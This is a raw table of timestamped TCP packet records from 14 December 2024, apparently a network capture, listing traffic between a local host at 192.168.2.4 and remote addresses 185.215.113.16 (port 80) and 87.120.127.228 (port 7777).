Dec 14, 2024 23:58:28.988034010 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.988034010 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.988858938 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.988934040 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.989027023 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.989171982 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.989913940 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.989989996 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.990030050 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.990109921 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.991050005 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.991084099 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.991102934 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.991132975 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.992002964 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.992055893 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.992125988 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.992186069 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.993180037 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.993213892 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.993232012 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.993261099 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.994121075 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.994235992 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.994287968 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.994313955 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.995198965 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.995234013 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.995253086 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.995287895 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.996145010 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.996278048 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.996325970 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.997138977 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.997193098 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.997347116 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.997395039 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.998178959 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.998230934 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.998312950 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.998361111 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.999192953 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.999264956 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.999335051 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.999383926 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.000303984 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.000356913 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.000363111 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.000406027 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.001353979 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.001414061 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.001461029 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.001570940 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.002285004 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.002340078 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.002424955 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.002473116 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.003329992 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.003391981 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.003571033 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.003623962 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.004379988 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.004427910 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.004514933 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.004559040 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.005403996 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.005464077 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.005582094 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.005721092 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.006486893 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.006575108 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.006588936 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.006614923 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.007441044 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.007586002 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.007636070 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.008579016 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.008641005 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.008761883 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.008820057 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.009660959 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.009695053 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.009715080 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.009851933 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.010545015 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.010601997 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.010756016 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.010811090 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.011586905 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.011636972 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.011970997 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.012065887 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.012655973 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.012773037 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.012846947 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.013634920 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.013818026 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.013825893 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.013863087 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.014827013 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.014862061 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.014961958 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.015878916 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.015912056 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.015978098 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.016777039 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.016835928 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.017080069 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.017126083 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.017782927 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.017841101 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.017927885 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.018043995 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.018863916 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.018913984 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.019033909 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.019089937 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.019892931 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.019959927 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.020040989 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.020087957 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.020987034 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.021044016 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.021075010 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.021122932 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.022027016 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.022217989 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.022277117 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.023015022 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.023091078 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.023102999 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.023272038 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.024053097 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.024110079 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.024157047 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.024200916 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.025230885 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.025290012 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.060287952 CET	49824	7777	192.168.2.4	87.120.127.228
Dec 14, 2024 23:58:29.163670063 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.163703918 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.163747072 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.163747072 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.164246082 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.164263010 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.164314985 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.165226936 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.165242910 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.165287971 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.165287971 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.166100979 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.166151047 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.166496038 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.166567087 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.167211056 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.167263985 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.167347908 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.167403936 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.168226004 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.168282032 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.168349981 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.168416977 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.169378996 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.169414043 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.169435024 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.169466972 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.170262098 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.170327902 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.170387983 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.170443058 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.171380043 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.171428919 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.171547890 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.171607018 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.172398090 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.172446966 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.172509909 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.172558069 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.173358917 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.173410892 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.173520088 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.173656940 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.174396038 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.174444914 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.174511909 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.174561024 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.175399065 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.175450087 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.175730944 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.175780058 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.176521063 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.176573992 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.176623106 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.177578926 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.177613020 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.177642107 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.177654982 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.178632021 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.178664923 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.178692102 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.178705931 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.179663897 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.179697037 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.179744959 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.180567026 CET	7777	49824	87.120.127.228	192.168.2.4
Dec 14, 2024 23:58:29.180597067 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.180663109 CET	49824	7777	192.168.2.4	87.120.127.228
Dec 14, 2024 23:58:29.180671930 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.180749893 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.180804968 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.181629896 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.181703091 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.181756020 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.182142973 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.182624102 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.182821989 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.182851076 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.182890892 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.183675051 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.183739901 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.183810949 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.183861971 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.184700012 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.184743881 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.184947014 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.185008049 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.185806990 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.185877085 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.185952902 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.186213017 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.186737061 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.186789036 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.187062979 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.187123060 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.187798977 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.187846899 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.187957048 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.188004017 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.188939095 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.188971996 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.188997984 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.189011097 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.189995050 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.190027952 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.190049887 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.190063953 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.190962076 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.191008091 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.191129923 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.191180944 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.192024946 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.192076921 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.192081928 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.192214012 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.193028927 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.193078041 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.193124056 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.193172932 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.194013119 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.194063902 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.194520950 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.194580078 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.195017099 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.195065022 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.195179939 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.195266008 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.196074963 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.196132898 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.196207047 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.196254969 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.197196007 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.197243929 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.197280884 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.197329044 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.198308945 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.198340893 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.198369026 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.198388100 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.199193001 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.199285030 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.199379921 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.199434996 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.200195074 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.200248957 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.200514078 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.200790882 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.201270103 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.201355934 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.201457024 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.201514006 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.202342033 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.202402115 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.202409983 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.202459097 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.203222036 CET	49824	7777	192.168.2.4	87.120.127.228
Dec 14, 2024 23:58:29.203299999 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.203428984 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.203454018 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.203504086 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.204384089 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.204436064 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.204469919 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.204520941 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.205569029 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.205601931 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.205627918 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.205641985 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.206516027 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.206566095 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.206617117 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.207554102 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.207587004 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.207613945 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.207653999 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.208532095 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.208578110 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.208683968 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.208734035 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.209558964 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.209650993 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.209660053 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.209707975 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.210654020 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.210685968 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.210712910 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.210727930 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.211663961 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.211716890 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.211719036 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.211788893 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.212606907 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.212708950 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.212774038 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.212822914 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.213726044 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.213759899 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.213782072 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.213795900 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.214673042 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.214725971 CET	49813	80	192.168.2.4	185.215.113.16
